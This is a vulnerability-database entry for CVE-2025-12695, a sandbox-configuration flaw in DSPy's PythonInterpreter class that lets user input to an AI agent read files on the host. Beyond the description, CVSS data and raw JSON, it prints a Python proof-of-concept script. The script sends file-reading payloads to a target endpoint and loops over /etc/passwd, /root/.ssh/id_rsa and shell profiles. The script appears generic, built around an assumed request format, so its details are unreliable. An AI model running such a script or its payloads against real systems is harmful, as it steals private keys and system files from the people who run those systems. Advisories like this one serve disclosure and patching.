Security Vulnerability Report
CVE-2025-12695 CVSS 5.9 MEDIUM

Published: 2025-11-04 14:15:34
Last Modified: 2026-04-15 00:35:42

Description

The overly permissive sandbox configuration in DSPy allows attackers to steal sensitive files in cases when users build an AI agent which consumes user input and uses the “PythonInterpreter” class.

CVSS Details

CVSS Score: 5.9
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

No configuration data available.

DSPy < 2.5.35
DSPy PythonInterpreter class (all versions prior to patch)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests
import json

# CVE-2025-12695 PoC - DSPy PythonInterpreter Sandbox Escape
# Target: DSPy application using PythonInterpreter with user input

def exploit_dspy_file_read(target_url, target_file='/etc/passwd'):
    """
    Exploit DSPy PythonInterpreter sandbox escape to read arbitrary files
    """
    # Malicious payload to read files through PythonInterpreter
    payload = f"__import__('os').read(__import__('os').open('{target_file}', 0), 10000)"

    # Alternative payload using built-in open
    alt_payload = f"open('{target_file}').read()"

    # Send request to vulnerable endpoint
    data = {
        'input': payload,
        'use_interpreter': True
    }

    try:
        response = requests.post(target_url, json=data, timeout=10)
        if response.status_code == 200:
            result = response.json()
            print(f"[+] Successfully read file: {target_file}")
            print(result.get('output', 'No output'))
            return True
    except Exception as e:
        print(f"[-] Error: {e}")
    return False

# Example usage
if __name__ == "__main__":
    target = "http://vulnerable-app.com/api/execute"

    # Read sensitive files
    files_to_read = [
        '/etc/passwd',
        '/root/.ssh/id_rsa',
        '/home/*/.bashrc'
    ]

    for file_path in files_to_read:
        exploit_dspy_file_read(target, file_path)

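References

https://research.jfrog.com/vulnerabilities/dspy-sandbox-escape-arbitrary-file-read-jfsa-2025-001495652/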

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-12695", "sourceIdentifier": "[email protected]", "published": "2025-11-04T14:15:34.087", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The overly permissive sandbox configuration in DSPy allows attackers to steal sensitive files in cases when users build an AI agent which consumes user input and uses the “PythonInterpreter” class."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 5.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.2, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-653"}]}], "references": [{"url": "https://research.jfrog.com/vulnerabilities/dspy-sandbox-escape-arbitrary-file-read-jfsa-2025-001495652/", "source": "[email protected]"}]}}